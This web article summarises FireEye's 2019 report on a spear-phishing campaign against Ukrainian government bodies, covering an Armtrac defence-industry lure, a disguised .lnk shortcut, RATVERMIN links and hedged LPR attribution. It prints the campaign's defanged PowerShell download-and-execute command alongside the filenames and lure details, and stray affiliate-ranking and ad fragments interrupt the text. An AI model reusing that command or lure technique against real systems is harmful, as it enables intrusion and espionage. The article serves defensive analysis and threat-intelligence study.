On April 16, 2019, FireEye reported a spear-phishing campaign against Ukrainian government organizations, including military departments. The operation used a defense-industry impersonation, a compressed archive and a malicious Windows shortcut that launched PowerShell. FireEye found infrastructure and malware overlaps suggesting the operators may have been associated with the self-proclaimed Luhansk People’s Republic (LPR), but did not prove that the LPR government ordered the operation, that Russia directly controlled it, or that the specific targets lost data.
This is a historical incident report, not a newly occurring 2026 campaign. The key phishing email was dated January 22, 2019.
What happened
The campaign was an apparent cyber-espionage operation focused unusually tightly on Ukraine. The lure concerned the sale of demining equipment and was sent to Ukrainian government recipients, including military entities. FireEye presented it as part of activity targeting the Ukrainian government as early as 2014 and associated with the RATVERMIN, also called Vermin, backdoor.
CyberScoop’s contemporaneous report described the campaign and FireEye’s cautious assessment of a possible LPR connection: CyberScoop, April 16, 2019. The technical details came from FireEye’s analysis, now hosted by Mandiant and Google Cloud: Mandiant/Google Cloud.
#1 Best Overall
Timeline and attack chain
- January 22, 2019: A forged defense-industry email reached Ukrainian targets.
- The message carried a compressed
.7zattachment containing decoy documents and a malicious shortcut. - The shortcut was made to look like a PDF and used an altered document icon.
- Opening it invoked PowerShell.
- PowerShell attempted to contact a remote domain and retrieve a second-stage script or payload.
- RATVERMIN-related malware and overlapping infrastructure supplied context for FireEye’s investigation.
The server was unreachable when FireEye examined the sample. As a result, the complete downstream behavior could not be observed from that sample alone.
How the Armtrac lure worked
The sender impersonated Armtrac, a legitimate U.K. defense manufacturer. The technical-looking subject line was:
SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD
The attachment, Armtrac-Commercial.7z, included two legitimate-looking Armtrac documents copied from company materials. It also contained:
Rank #2
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk
The filename used a PDF-looking ending, while the file was actually a Windows shortcut. Its icon was made to resemble a Microsoft Word document, adding another layer of deception. This combination—credible procurement content, a compressed archive, misleading extensions and a familiar icon—was designed to make a technically plausible message feel routine.
What the malicious shortcut did
The shortcut launched an obfuscated, Base64-encoded PowerShell expression that attempted to download a script from:
http://sinoptik[.]website/EuczSc
FireEye rendered the relevant command in this form:
powershell -e iex(iwr -useb http://sinoptik[.]website/EuczSc)
Here, -e invokes encoded PowerShell, while iwr (the Invoke-WebRequest alias) requests remote content and iex (the Invoke-Expression alias) attempts to execute it. The command shows capability and intent; it does not by itself prove that the download or execution succeeded.
Who was allegedly behind it?
Attribution needs to be separated into distinct layers:
What’s actually slowing this PC down?
Pick the symptom - the matching free tool is one click away.
Observed activity
FireEye analyzed the email, shortcut, PowerShell downloader, domains and related malware. These are direct observations of the intrusion materials.
Malware lineage
The campaign was linked to RATVERMIN/Vermin, a .NET backdoor FireEye had tracked in Ukraine-focused activity since 2018. Related infrastructure also overlapped with samples associated with QUASARRAT, or QUASAR. A malware-family relationship does not, by itself, identify the person or organization operating it.
Infrastructure association
The command-and-control domain had passive-DNS history involving an IP address previously associated with domains tied to RATVERMIN and QUASARRAT. FireEye also identified a related punycode domain corresponding to a website associated with the so-called LPR Ministry of State Security.
Political attribution
Those overlaps led FireEye to assess that the operators may have been associated with the self-proclaimed LPR. The wording was deliberately provisional and required more evidence. Shared hosting, reused IP space or a domain’s historical associations can support a hypothesis without proving exclusive control.
Best Value
The LPR was a self-declared, internationally unrecognized separatist authority in eastern Ukraine that operated with Russian backing. “Quasi-Russian upstart” is editorial shorthand used in the headline, not the name of a threat group or a formal technical classification. Neutral descriptions such as “Russia-backed separatist authority” avoid turning a political label into an actor identity.
Independent reader supportYour contribution helps us test, update, and keep practical guides available for everyone.What the evidence does—and does not—show
| Question | What the public reporting supports |
|---|---|
| Was Ukraine targeted? | Yes. Ukrainian government entities, including military departments, received the spear-phishing messages. |
| Was the operation built for espionage? | Yes. The downloader sought to retrieve a second-stage payload from remote infrastructure. |
| Was RATVERMIN involved? | The activity was associated with RATVERMIN/Vermin-related malware and infrastructure; that does not prove every stage came from one operator. |
| Did the LPR government order it? | Not established. FireEye reported a potential association requiring more evidence. |
| Was Russia directly responsible? | Not established by this report. FireEye did not publicly prove direct Russian military or intelligence control. |
| Was data stolen? | Not publicly confirmed for the reported operation. CyberScoop reported that researchers considered success possible, but possibility is not evidence of exfiltration. |
Why Ukraine was a concentrated target
FireEye analysts described the activity as unusually focused on Ukrainian organizations rather than broadly distributed worldwide. A narrow target set can help operators refine local language, institutional knowledge and social-engineering themes. CyberScoop placed the campaign in the wider pattern of Ukraine serving as a frequent target and testing environment for Russia-linked cyber operations, while noting that FireEye had not made a direct Russia attribution in this case.
Why the campaign matters
- Proxy operations blur responsibility. A separatist or quasi-state actor can conduct sustained espionage while leaving uncertainty about political control.
- Basic techniques can be effective. A realistic procurement lure and benign decoys can make a shortcut-and-PowerShell chain credible to a busy recipient.
- Trusted tools complicate detection. PowerShell is a legitimate Windows component, so defenders must monitor context and parent-child behavior rather than simply blocking the executable.
- Technical attribution is probabilistic. Malware similarities, passive DNS and domain history can connect campaigns without identifying the ultimate sponsor.
Defensive lessons for organizations
- Treat email archives and shortcut files, including
.7z,.zipand.lnk, as high-risk attachments. - Configure Windows to display complete file extensions and train users to inspect the actual type, not only the icon or apparent name.
- Alert when archive or document applications spawn
powershell.exe,mshta.exeor other script interpreters. - Log and restrict PowerShell’s network access where operationally feasible; blocking PowerShell outright can disrupt legitimate administration.
- Use attachment sandboxing or detonation for shortcut and script-bearing files.
- Verify supplier identities through an independent channel instead of replying to the message or using contact details inside it.
- Use the published domain as a historical hunting indicator only. Its presence in a log does not establish that it remains active or malicious today.
Historical indicators and source record
The principal public indicators in the report are:
- Attachment:
Armtrac-Commercial.7z - Shortcut:
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk - Defanged URL:
http://sinoptik[.]website/EuczSc - Associated malware names: RATVERMIN/Vermin and related QUASARRAT/QUASAR infrastructure
For the original technical account, see FireEye’s Mandiant/Google Cloud report. For contemporaneous reporting and analyst comments, see CyberScoop. SecurityWeek published a summary at SecurityWeek.
Quick Recap
Product prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on Amazon at the time of purchase will apply.
The Tool Desk
Outbyte Driver Updater FREEFix the driver behind crashes, sound loss and screen glitchesFind Drivers →Outbyte PC Repair FREEClear out junk files and repair common Windows errorsFree Scan →




